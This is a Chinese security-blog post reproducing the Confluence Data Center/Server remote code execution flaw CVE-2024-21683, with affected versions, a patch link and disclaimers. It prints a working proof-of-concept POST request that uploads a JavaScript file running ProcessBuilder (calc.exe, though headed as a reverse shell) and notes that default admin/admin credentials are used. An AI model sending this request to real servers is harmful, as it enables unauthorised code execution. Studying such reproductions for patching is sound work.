Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)

admin 2024年5月29日16:50:27评论51 views字数 2214阅读7分22秒阅读模式
0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)

0x01漏洞介绍

Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。

Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在远程代码执行问题,允许经过身份验证的攻击者执行任意代码。

【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)

0x02影响版本

1、 Data Center == 8.9.0

2、 8.8.0 <= Data Center <= 8.8.1

3、 8.7.0 <= Data Center <= 8.7.2

4、 8.6.0 <= Data Center <= 8.6.2

5、 8.5.0 <= Data Center <= 8.5.8 LTS

6、 8.4.0 <= Data Center <= 8.4.5

7、 8.3.0 <= Data Center <= 8.3.4

8、 8.2.0 <= Data Center <= 8.2.3

9、 8.1.0 <= Data Center <= 8.1.4

10、 8.0.0 <= Data Center <= 8.0.4

11、 7.20.0 <= Data Center <= 7.20.3

12、 7.19.0 <= Data Center <= 7.19.21 LTS

13、 7.18.0 <= Data Center <= 7.18.3

14、 7.17.0 <= Data Center <= 7.17.5

15、 8.5.0 <= Server <= 8.5.8 LTS

16、 8.4.0 <= Server <= 8.4.5

17、 8.3.0 <= Server <= 8.3.4

18、 8.2.0 <= Server <= 8.2.3

19、 8.1.0 <= Server <= 8.1.4

20、 8.0.0 <= Server <= 8.0.4

21、 7.20.0 <= Server <= 7.20.3

22、 7.19.0 <= Server <= 7.19.21 LTS

23、 7.18.0 <= Server <= 7.18.3

24、 7.17.0 <= Server <= 7.17.5


【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)

注:利用需要默认admin/admin登录

【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)

0x03漏洞复现

1.访问漏洞环境

【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)

2.对漏洞进行复现

POC (POST)

漏洞复现(反弹shell)

POST /admin/plugins/newcode/addlanguage.action HTTP/1.1Host: 172.17.151.129:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Length: 459Content-Type: multipart/form-data; boundary=690dd62eb49730d16f0a919d8736b152
--690dd62eb49730d16f0a919d8736b152Content-Disposition: form-data; name="atl_token"
tockenxxxx--690dd62eb49730d16f0a919d8736b152Content-Disposition: form-data; name="newLanguageName"
test--690dd62eb49730d16f0a919d8736b152Content-Disposition: form-data; name="languageFile"; filename="exploit.js"Content-Type: text/javascript
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()--690dd62eb49730d16f0a919d8736b152--

【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)

js执行payload

new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()


【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://confluence.atlassian.com/pages/viewpage.action?pageId=1387867145https://github.com/W01fh4cker/CVE-2024-21683-RCEhttps://ti.qianxin.com/vulnerability/detail/353479



弥天简介

学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来


















【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


弥 天

安全实验室

【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)

原文始发于微信公众号(弥天安全实验室):【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月29日16:50:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)https://cn-sec.com/archives/2787681.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息